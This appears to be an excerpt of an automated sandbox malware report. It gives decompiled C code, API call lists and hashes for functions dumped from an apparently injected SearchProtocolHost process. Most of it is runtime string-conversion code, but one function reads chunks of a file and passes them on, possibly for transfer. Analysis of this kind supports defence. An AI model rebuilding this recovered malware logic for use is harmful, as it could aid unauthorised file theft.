																		_t126 = E02FB7DA7(_t108, _v48, _a12, _v32, _v44, _t127, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E02FBA677(_t127);
													}
												}
											}
										}
									}
								}
								E02FBA677(_t100);
							}
						}
					}
				}
				L63:
				return E02FB0A5D(_v8 ^ _t128, _t127);
			}




































                                                0x02fc1a11
                                                0x02fc1a18
                                                0x02fc1a20
                                                0x02fc1a23
                                                0x02fc1a29
                                                0x02fc1a2c
                                                0x02fc1a2f
                                                0x02fc1a33
                                                0x02fc1a36
                                                0x02fc1a3b
                                                0x02fc1a62
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fc1a3d
                                                0x02fc1a45
                                                0x02fc1a47
                                                0x02fc1a4b
                                                0x02fc1a4b
                                                0x02fc1a50
                                                0x02fc1a6e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fc1a52
                                                0x02fc1a5b
                                                0x02fc1a70
                                                0x02fc1a70
                                                0x02fc1a75
                                                0x02fc1a7c
                                                0x02fc1a7f
                                                0x02fc1a7f
                                                0x02fc1a84
                                                0x02fc1a90
                                                0x02fc1a9d
                                                0x02fc1aaa
                                                0x02fc1abd
                                                0x00000000
                                                0x02fc1abf
                                                0x02fc1ac1
                                                0x02fc1af4
                                                0x00000000
                                                0x02fc1af6
                                                0x02fc1af8
                                                0x02fc1afc
                                                0x02fc1b02
                                                0x02fc1b05
                                                0x02fc1b07
                                                0x02fc1b0a
                                                0x02fc1b0a
                                                0x02fc1b0f
                                                0x00000000
                                                0x00000000
                                                0x02fc1b11
                                                0x02fc1b15
                                                0x02fc1b1f
                                                0x02fc1b24
                                                0x00000000
                                                0x02fc1b26
                                                0x00000000
                                                0x02fc1b26
                                                0x02fc1b24
                                                0x00000000
                                                0x02fc1b15
                                                0x02fc1b0a
                                                0x02fc1b05
                                                0x00000000
                                                0x02fc1afc
                                                0x02fc1ac3
                                                0x02fc1ac5
                                                0x02fc1ac9
                                                0x02fc1acf
                                                0x02fc1ad2
                                                0x02fc1ad4
                                                0x02fc1ad4
                                                0x02fc1ad9
                                                0x00000000
                                                0x00000000
                                                0x02fc1adb
                                                0x02fc1adf
                                                0x02fc1ae9
                                                0x02fc1aee
                                                0x00000000
                                                0x02fc1af0
                                                0x00000000
                                                0x02fc1af0
                                                0x02fc1aee
                                                0x00000000
                                                0x02fc1adf
                                                0x02fc1ad4
                                                0x02fc1ad2
                                                0x00000000
                                                0x02fc1ac9
                                                0x02fc1ac1
                                                0x02fc1aac
                                                0x02fc1aac
                                                0x02fc1aac
                                                0x00000000
                                                0x02fc1aac
                                                0x02fc1a9f
                                                0x02fc1a9f
                                                0x02fc1aa1
                                                0x02fc1a92
                                                0x02fc1a92
                                                0x02fc1a94
                                                0x02fc1a94
                                                0x02fc1b2b
                                                0x02fc1b2b
                                                0x02fc1b2b
                                                0x02fc1b38
                                                0x02fc1b3e
                                                0x02fc1b43
                                                0x02fc1a64
                                                0x02fc1b49
                                                0x02fc1b49
                                                0x02fc1b51
                                                0x02fc1b55
                                                0x02fc1bb0
                                                0x02fc1bb2
                                                0x00000000
                                                0x02fc1b57
                                                0x02fc1b5c
                                                0x02fc1b5e
                                                0x02fc1b60
                                                0x02fc1b68
                                                0x02fc1b8c
                                                0x02fc1b91
                                                0x02fc1b96
                                                0x02fc1b9c
                                                0x00000000
                                                0x02fc1ba2
                                                0x02fc1ba2
                                                0x00000000
                                                0x02fc1ba2
                                                0x02fc1b6a
                                                0x02fc1b6c
                                                0x02fc1b70
                                                0x02fc1b75
                                                0x02fc1b77
                                                0x02fc1b7c
                                                0x02fc1c91
                                                0x02fc1c91
                                                0x02fc1b82
                                                0x02fc1b82
                                                0x02fc1ba8
                                                0x02fc1ba8
                                                0x02fc1bab
                                                0x02fc1bb5
                                                0x02fc1bb7
                                                0x00000000
                                                0x02fc1bbd
                                                0x02fc1bc5
                                                0x02fc1bd3
                                                0x00000000
                                                0x02fc1bd9
                                                0x02fc1be2
                                                0x02fc1be8
                                                0x02fc1bed
                                                0x00000000
                                                0x02fc1bf3
                                                0x02fc1bf3
                                                0x02fc1bf6
                                                0x02fc1bfb
                                                0x02fc1bff
                                                0x02fc1c4b
                                                0x00000000
                                                0x02fc1c01
                                                0x02fc1c06
                                                0x02fc1c08
                                                0x02fc1c0a
                                                0x02fc1c12
                                                0x02fc1c2f
                                                0x02fc1c39
                                                0x02fc1c3b
                                                0x02fc1c3e
                                                0x00000000
                                                0x02fc1c40
                                                0x02fc1c40
                                                0x00000000
                                                0x02fc1c40
                                                0x02fc1c14
                                                0x02fc1c16
                                                0x02fc1c1a
                                                0x02fc1c1f
                                                0x02fc1c23
                                                0x02fc1c85
                                                0x02fc1c85
                                                0x02fc1c25
                                                0x02fc1c25
                                                0x02fc1c46
                                                0x02fc1c46
                                                0x02fc1c4d
                                                0x02fc1c4f
                                                0x00000000
                                                0x02fc1c68
                                                0x02fc1c68
                                                0x02fc1c81
                                                0x02fc1c81
                                                0x02fc1c4f
                                                0x02fc1c23
                                                0x02fc1c12
                                                0x02fc1c89
                                                0x02fc1c8e
                                                0x02fc1bed
                                                0x02fc1bd3
                                                0x02fc1bb7
                                                0x02fc1b7c
                                                0x02fc1b68
                                                0x02fc1c95
                                                0x02fc1c9b
                                                0x02fc1b43
                                                0x02fc1a84
                                                0x02fc1a50
                                                0x02fc1c9d
                                                0x02fc1cb0

                                                APIs
                                                • GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,?,02FC1CE2,?,?,?,?,?,?,?,?,?), ref: 02FC1AB5
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,02FC1CE2,?,?,?,?,?,?,?,?), ref: 02FC1B38
                                                • __alloca_probe_16.LIBCMT ref: 02FC1B70
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,02FC1CE2,?,02FC1CE2,?,?,?,?,?,?,?,?), ref: 02FC1BCB
                                                • __alloca_probe_16.LIBCMT ref: 02FC1C1A
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,02FC1CE2,?,?,?,?,?,?,?,?), ref: 02FC1BE2
                                                  • Part of subcall function 02FB7882: RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,02FC1CE2,?,?,?,?,?,?,?,?), ref: 02FC1C5E
                                                • __freea.LIBCMT ref: 02FC1C89
                                                • __freea.LIBCMT ref: 02FC1C95
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                • String ID:
                                                • API String ID: 201697637-0
                                                • Opcode ID: 54e07a4f4fe6c3d99819f3a0339c4602d107c8864cf671aa7357b8dba93cd8bb
                                                • Instruction ID: e125390cd8c8f0f2e81515320964b278db3f327aef1833bc92cdec441faa6977
                                                • Opcode Fuzzy Hash: 54e07a4f4fe6c3d99819f3a0339c4602d107c8864cf671aa7357b8dba93cd8bb
                                                • Instruction Fuzzy Hash: F191C672E002179EDB24CE64CE80AFFBBB5AF09794F24455DEA09E7142EB35D854CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA8BB0 Relevance: 13.7, APIs: 9, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E02FA8BB0(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v24;
				char _v28;
				void* _v32;
				struct _CRITICAL_SECTION _v56;
				long _v60;
				long _v64;
				void* _v68;
				char _v72;
				long _v76;
				void* __esi;
				signed int _t63;
				signed int _t64;
				void* _t67;
				void* _t75;
				void* _t82;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t100;
				intOrPtr* _t112;
				void* _t113;
				void* _t115;
				intOrPtr _t117;
				intOrPtr* _t124;
				signed char* _t135;
				intOrPtr* _t139;
				intOrPtr _t142;
				void* _t146;
				struct _CRITICAL_SECTION* _t147;
				signed int _t148;
				void* _t149;
				void* _t150;
				void* _t151;

				_push(0xffffffff);
				_push(E02FC4728);
				_push( *[fs:0x0]);
				_t150 = _t149 - 0x3c;
				_t63 =  *0x2fcf008; // 0x93ad1eea
				_t64 = _t63 ^ _t148;
				_v20 = _t64;
				_push(_t64);
				 *[fs:0x0] =  &_v16;
				_t145 = __ecx;
				_t117 = _a12;
				_t142 = _a4;
				_t139 = _a8;
				if(_t117 != 0) {
					__eflags = _t117 - 5;
					if(_t117 != 5) {
						L5:
						E02FA8690(_t142, _t139, _t117);
						_t67 = E02FA87A0(_t142);
						__eflags = _t67 - 0xd;
						if(_t67 > 0xd) {
							while(1) {
								_t112 =  *((intOrPtr*)(_t142 + 4));
								_t124 =  &_v28;
								_v28 =  *_t112;
								_v24 =  *((intOrPtr*)(_t112 + 4));
								__eflags =  *((intOrPtr*)(_t145 + 0x214)) -  *_t124;
								if( *((intOrPtr*)(_t145 + 0x214)) !=  *_t124) {
									break;
								}
								__eflags = ( *(_t145 + 0x218) & 0x000000ff) -  *((intOrPtr*)(_t124 + 4));
								if(( *(_t145 + 0x218) & 0x000000ff) !=  *((intOrPtr*)(_t124 + 4))) {
									break;
								} else {
									_t113 =  *(_t112 + 5);
									_v32 = _t113;
									__eflags = _t113;
									if(_t113 != 0) {
										_t126 = _t142;
										_t75 = E02FA87A0(_t142);
										__eflags = _t75 - _t113;
										if(_t75 >= _t113) {
											_v76 = 0;
											E02FA8700(_t126,  &_v28, 5);
											E02FA8700(_t142,  &_v32, 4);
											E02FA8700(_t142,  &_v76, 4);
											_t115 = _v32 + 0xfffffff3;
											_push(_t115);
											_t82 = E02FB0AB4(_t145, __eflags);
											_t151 = _t150 + 4;
											_v32 = _t82;
											E02FA8700(_t142, _t82, _t115);
											_v72 = 0x2fccab8;
											_v60 = 0;
											_v68 = 0;
											_v64 = 0;
											InitializeCriticalSection( &_v56);
											_v8 = 0;
											EnterCriticalSection( &_v56);
											_v64 = _v68;
											E02FA8840( &_v72, 0x400);
											LeaveCriticalSection( &_v56);
											EnterCriticalSection( &_v56);
											_t90 = _v68;
											__eflags = _t90;
											_t133 =  ==  ? 0 : _v64 - _t90;
											_t92 = E02FA87B0( &_v72, ( ==  ? 0 : _v64 - _t90) + _t115);
											__eflags = _t92 - 0xffffffff;
											if(_t92 != 0xffffffff) {
												E02FC3DB0(_v64, _v32, _t115);
												_t151 = _t151 + 0xc;
												_t44 =  &_v64;
												 *_t44 = _v64 + _t115;
												__eflags =  *_t44;
											}
											LeaveCriticalSection( &_v56);
											_t135 = _v68;
											_t95 = ( *_t135 & 0x000000ff) - 0x34;
											__eflags = _t95;
											if(_t95 == 0) {
												L16:
												E02FA88D0(_t145);
											} else {
												__eflags = _t95 == 1;
												if(_t95 == 1) {
													 *(_t145 + 0xc) = _t135[8];
													 *(_t145 + 8) = _t135[4];
													goto L16;
												}
											}
											E02FB0AAF(_v32);
											_v8 = 0xffffffff;
											_t150 = _t151 + 4;
											_t98 = _v68;
											_v72 = 0x2fccab8;
											__eflags = _t98;
											if(_t98 != 0) {
												VirtualFree(_t98, 0, 0x8000);
											}
											DeleteCriticalSection( &_v56);
											_t100 = E02FA87A0(_t142);
											__eflags = _t100 - 0xd;
											if(_t100 > 0xd) {
												continue;
											} else {
											}
										}
									}
								}
								goto L22;
							}
							_t147 = _t142 + 0x10;
							EnterCriticalSection(_t147);
							 *((intOrPtr*)(_t142 + 8)) =  *((intOrPtr*)(_t142 + 4));
							E02FA8840(_t142, 0x400);
							LeaveCriticalSection(_t147);
						}
					} else {
						__eflags =  *_t139 -  *((intOrPtr*)(__ecx + 0x214));
						if( *_t139 !=  *((intOrPtr*)(__ecx + 0x214))) {
							goto L5;
						} else {
							__eflags = ( *(_t139 + 4) & 0x000000ff) -  *((intOrPtr*)(__ecx + 0x218));
							if(( *(_t139 + 4) & 0x000000ff) !=  *((intOrPtr*)(__ecx + 0x218))) {
								goto L5;
							}
						}
					}
				} else {
					 *((intOrPtr*)( *((intOrPtr*)( *__ecx)) + 0x18))();
				}
				L22:
				 *[fs:0x0] = _v16;
				_pop(_t146);
				return E02FB0A5D(_v20 ^ _t148, _t146);
			}








































                                                0x02fa8bb3
                                                0x02fa8bb5
                                                0x02fa8bc0
                                                0x02fa8bc1
                                                0x02fa8bc4
                                                0x02fa8bc9
                                                0x02fa8bcb
                                                0x02fa8bd1
                                                0x02fa8bd5
                                                0x02fa8bdb
                                                0x02fa8bdd
                                                0x02fa8be0
                                                0x02fa8be3
                                                0x02fa8be8
                                                0x02fa8bf6
                                                0x02fa8bf9
                                                0x02fa8c15
                                                0x02fa8c19
                                                0x02fa8c20
                                                0x02fa8c25
                                                0x02fa8c28
                                                0x02fa8c30
                                                0x02fa8c30
                                                0x02fa8c33
                                                0x02fa8c38
                                                0x02fa8c3e
                                                0x02fa8c47
                                                0x02fa8c49
                                                0x00000000
                                                0x00000000
                                                0x02fa8c56
                                                0x02fa8c59
                                                0x00000000
                                                0x02fa8c5f
                                                0x02fa8c5f
                                                0x02fa8c62
                                                0x02fa8c65
                                                0x02fa8c67
                                                0x02fa8c6d
                                                0x02fa8c6f
                                                0x02fa8c74
                                                0x02fa8c76
                                                0x02fa8c81
                                                0x02fa8c89
                                                0x02fa8c96
                                                0x02fa8ca3
                                                0x02fa8cab
                                                0x02fa8cae
                                                0x02fa8caf
                                                0x02fa8cb4
                                                0x02fa8cb7
                                                0x02fa8cbe
                                                0x02fa8cc6
                                                0x02fa8cce
                                                0x02fa8cd5
                                                0x02fa8cdc
                                                0x02fa8ce3
                                                0x02fa8cec
                                                0x02fa8cf4
                                                0x02fa8d05
                                                0x02fa8d08
                                                0x02fa8d11
                                                0x02fa8d1b
                                                0x02fa8d21
                                                0x02fa8d2b
                                                0x02fa8d2d
                                                0x02fa8d37
                                                0x02fa8d3c
                                                0x02fa8d3f
                                                0x02fa8d48
                                                0x02fa8d4d
                                                0x02fa8d50
                                                0x02fa8d50
                                                0x02fa8d50
                                                0x02fa8d50
                                                0x02fa8d57
                                                0x02fa8d5d
                                                0x02fa8d63
                                                0x02fa8d63
                                                0x02fa8d66
                                                0x02fa8d79
                                                0x02fa8d7b
                                                0x02fa8d68
                                                0x02fa8d68
                                                0x02fa8d6b
                                                0x02fa8d70
                                                0x02fa8d76
                                                0x00000000
                                                0x02fa8d76
                                                0x02fa8d6b
                                                0x02fa8d83
                                                0x02fa8d88
                                                0x02fa8d8f
                                                0x02fa8d92
                                                0x02fa8d95
                                                0x02fa8d9c
                                                0x02fa8d9e
                                                0x02fa8da8
                                                0x02fa8da8
                                                0x02fa8db2
                                                0x02fa8dba
                                                0x02fa8dbf
                                                0x02fa8dc2
                                                0x00000000
                                                0x00000000
                                                0x02fa8dc8
                                                0x02fa8dc2
                                                0x02fa8c76
                                                0x02fa8c67
                                                0x00000000
                                                0x02fa8c59
                                                0x02fa8dca
                                                0x02fa8dce
                                                0x02fa8dde
                                                0x02fa8de1
                                                0x02fa8de7
                                                0x02fa8de7
                                                0x02fa8bfb
                                                0x02fa8bfd
                                                0x02fa8c03
                                                0x00000000
                                                0x02fa8c05
                                                0x02fa8c09
                                                0x02fa8c0f
                                                0x00000000
                                                0x00000000
                                                0x02fa8c0f
                                                0x02fa8c03
                                                0x02fa8bea
                                                0x02fa8bee
                                                0x02fa8bee
                                                0x02fa8ded
                                                0x02fa8df0
                                                0x02fa8df9
                                                0x02fa8e08

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,00000000), ref: 02FA8CE3
                                                • EnterCriticalSection.KERNEL32(?), ref: 02FA8CF4
                                                • LeaveCriticalSection.KERNEL32(?,00000400), ref: 02FA8D11
                                                • EnterCriticalSection.KERNEL32(?), ref: 02FA8D1B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Enter$InitializeLeave
                                                • String ID:
                                                • API String ID: 2951591641-0
                                                • Opcode ID: 28b0b53784966506b38c2f723d2eac693cc7c94ce461553c03041989dda387b2
                                                • Instruction ID: ef80923bf368c0bf10a3c82b978ab813d9f0d02b400b0d03b7cccb70cae36ba2
                                                • Opcode Fuzzy Hash: 28b0b53784966506b38c2f723d2eac693cc7c94ce461553c03041989dda387b2
                                                • Instruction Fuzzy Hash: CA61B2B0E40209EFCB14DFA4D9A4BAEBBBAFF05394F144519E616E7280DB74A901CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA88D0 Relevance: 13.6, APIs: 9, Instructions: 94filesleepmemoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02FA88D0(intOrPtr* __ecx) {
				intOrPtr* _v8;
				long _v12;
				long _v16;
				struct _SECURITY_ATTRIBUTES* _t34;
				CHAR* _t36;
				void* _t37;
				intOrPtr _t39;
				intOrPtr* _t41;
				void* _t43;
				struct _SECURITY_ATTRIBUTES* _t44;
				long _t45;

				_t44 = 0;
				_t36 = __ecx + 0x110;
				_v8 = __ecx;
				_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t43 != 0xffffffff) {
					L3:
					_t39 = _v8;
					_t4 = _t39 + 8; // 0x2fa8e40
					_t5 = _t39 + 0xc; // 0x2fa8ec0
					_t45 =  *_t5;
					_v12 =  *_t4;
					SetFilePointer(_t43, _t45,  &_v12, 0);
					_t37 = LocalAlloc(0x40, 0x19000);
					_t9 = _t37 + 9; // 0x9
					 *_t37 = 0x33;
					 *((intOrPtr*)(_t37 + 1)) = _v12;
					 *(_t37 + 5) = _t45;
					_v16 = 0;
					ReadFile(_t43, _t9, 0x18ff7,  &_v16, 0);
					CloseHandle(_t43);
					_t27 = _v16;
					_t41 = _v8;
					if(_v16 == 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t41)) + 0x18))();
						return LocalFree(_t37);
					}
					E02FA8A40(_t41, _t27 + 9, _t37, _t27 + 9);
					return LocalFree(_t37);
				} else {
					while(1) {
						_t34 = _t44;
						_t44 =  &(_t44->nLength);
						if(_t34 > 0xa) {
							break;
						}
						Sleep(0x12c);
						_t43 = CreateFileA(_t36, 0x80000000, 1, 0, 3, 0x80, 0);
						if(_t43 == 0xffffffff) {
							continue;
						} else {
							goto L3;
						}
						goto L7;
					}
					return _t34;
				}
				L7:
			}














                                                0x02fa88d9
                                                0x02fa88e8
                                                0x02fa88ee
                                                0x02fa88fd
                                                0x02fa8902
                                                0x02fa893b
                                                0x02fa893b
                                                0x02fa8940
                                                0x02fa8943
                                                0x02fa8943
                                                0x02fa8946
                                                0x02fa894f
                                                0x02fa8962
                                                0x02fa896f
                                                0x02fa8972
                                                0x02fa8979
                                                0x02fa897c
                                                0x02fa8980
                                                0x02fa8987
                                                0x02fa898e
                                                0x02fa8994
                                                0x02fa8997
                                                0x02fa899c
                                                0x02fa89ba
                                                0x00000000
                                                0x02fa89be
                                                0x02fa89a3
                                                0x02fa89b5
                                                0x02fa8904
                                                0x02fa8904
                                                0x02fa8904
                                                0x02fa8906
                                                0x02fa890a
                                                0x00000000
                                                0x00000000
                                                0x02fa8915
                                                0x02fa8934
                                                0x02fa8939
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fa8939
                                                0x02fa89ca
                                                0x02fa89ca
                                                0x00000000

                                                APIs
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,02FC4635,?,02FA8D80), ref: 02FA88F7
                                                • Sleep.KERNEL32(0000012C,?,02FA8D80), ref: 02FA8915
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,02FA8D80), ref: 02FA892E
                                                • SetFilePointer.KERNEL32(00000000,02FA8EC0,02FA8D80,00000000,?,02FA8D80), ref: 02FA894F
                                                • LocalAlloc.KERNEL32(00000040,00019000,?,02FA8D80), ref: 02FA895C
                                                • ReadFile.KERNEL32(00000000,00000009,00018FF7,?,00000000), ref: 02FA8987
                                                • CloseHandle.KERNEL32(00000000), ref: 02FA898E
                                                • LocalFree.KERNEL32(00000000,00000000,-00000009), ref: 02FA89A9
                                                • LocalFree.KERNEL32(00000000), ref: 02FA89BE
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$Local$CreateFree$AllocCloseHandlePointerReadSleep
                                                • String ID:
                                                • API String ID: 2044486136-0
                                                • Opcode ID: 2fb97733889873a8f1b45f3a24cb3356ce0bd0564d1d417b90685412c896b065
                                                • Instruction ID: 584fa0e10e4e39f597534a35e4c5169a9e529c77707783dde8c684f37ef6f3e9
                                                • Opcode Fuzzy Hash: 2fb97733889873a8f1b45f3a24cb3356ce0bd0564d1d417b90685412c896b065
                                                • Instruction Fuzzy Hash: 8631D971B40208BFD7109B64DC9DF9ABB7CEB097A0F204555FB05EB2C0C6B0A511C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FBA40F Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E02FBA40F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				void* _t104;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x2fcf008; // 0x93ad1eea
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E02FC002B(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t104);
					return E02FB0A5D(_v8 ^ _t106, _t104);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E02FBA677(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E02FB7FD8(_t85, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E02FBA677(_t101);
									goto L36;
								}
								_t62 = E02FB7FD8(_t87, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E02FBA677(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E02FB7882(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E02FC3C70();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E02FB7FD8(0, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E02FB7882(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E02FC3C70();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}




























                                                0x02fba414
                                                0x02fba415
                                                0x02fba416
                                                0x02fba41d
                                                0x02fba422
                                                0x02fba428
                                                0x02fba42e
                                                0x02fba434
                                                0x02fba437
                                                0x02fba437
                                                0x02fba43a
                                                0x02fba43c
                                                0x02fba43c
                                                0x02fba43a
                                                0x02fba43e
                                                0x02fba443
                                                0x02fba44a
                                                0x02fba44d
                                                0x02fba44d
                                                0x02fba469
                                                0x02fba46f
                                                0x02fba474
                                                0x02fba607
                                                0x02fba60b
                                                0x02fba61a
                                                0x02fba47a
                                                0x02fba47a
                                                0x02fba47d
                                                0x02fba482
                                                0x02fba486
                                                0x02fba4da
                                                0x02fba4da
                                                0x02fba4dc
                                                0x02fba4de
                                                0x02fba5fc
                                                0x02fba5fc
                                                0x02fba5fe
                                                0x02fba5ff
                                                0x00000000
                                                0x02fba605
                                                0x02fba4ef
                                                0x02fba4f5
                                                0x02fba4f7
                                                0x00000000
                                                0x00000000
                                                0x02fba4fd
                                                0x02fba50f
                                                0x02fba514
                                                0x02fba518
                                                0x00000000
                                                0x00000000
                                                0x02fba525
                                                0x02fba55f
                                                0x02fba562
                                                0x02fba565
                                                0x02fba567
                                                0x02fba569
                                                0x02fba56b
                                                0x02fba5b7
                                                0x02fba5b7
                                                0x02fba5b9
                                                0x02fba5b9
                                                0x02fba5bb
                                                0x02fba5f5
                                                0x02fba5f6
                                                0x00000000
                                                0x02fba5fb
                                                0x02fba5cf
                                                0x02fba5d4
                                                0x02fba5d6
                                                0x00000000
                                                0x00000000
                                                0x02fba5da
                                                0x02fba5db
                                                0x02fba5dc
                                                0x02fba5df
                                                0x02fba61b
                                                0x02fba61e
                                                0x02fba5e1
                                                0x02fba5e1
                                                0x02fba5e2
                                                0x02fba5e2
                                                0x02fba5ef
                                                0x02fba5f1
                                                0x02fba5f3
                                                0x02fba624
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fba5f3
                                                0x02fba56d
                                                0x02fba570
                                                0x02fba572
                                                0x02fba574
                                                0x02fba576
                                                0x02fba579
                                                0x02fba57e
                                                0x02fba599
                                                0x02fba59b
                                                0x02fba5a5
                                                0x02fba5a7
                                                0x02fba5a8
                                                0x02fba5aa
                                                0x00000000
                                                0x00000000
                                                0x02fba5ac
                                                0x02fba5b2
                                                0x02fba5b2
                                                0x00000000
                                                0x02fba5b2
                                                0x02fba580
                                                0x02fba582
                                                0x02fba586
                                                0x02fba58b
                                                0x02fba58d
                                                0x02fba58f
                                                0x00000000
                                                0x00000000
                                                0x02fba591
                                                0x00000000
                                                0x02fba591
                                                0x02fba527
                                                0x02fba52c
                                                0x00000000
                                                0x00000000
                                                0x02fba532
                                                0x02fba534
                                                0x00000000
                                                0x00000000
                                                0x02fba54b
                                                0x02fba550
                                                0x02fba554
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02fba55a
                                                0x02fba48d
                                                0x02fba48f
                                                0x02fba491
                                                0x02fba499
                                                0x02fba4b8
                                                0x02fba4ba
                                                0x02fba4c4
                                                0x02fba4c6
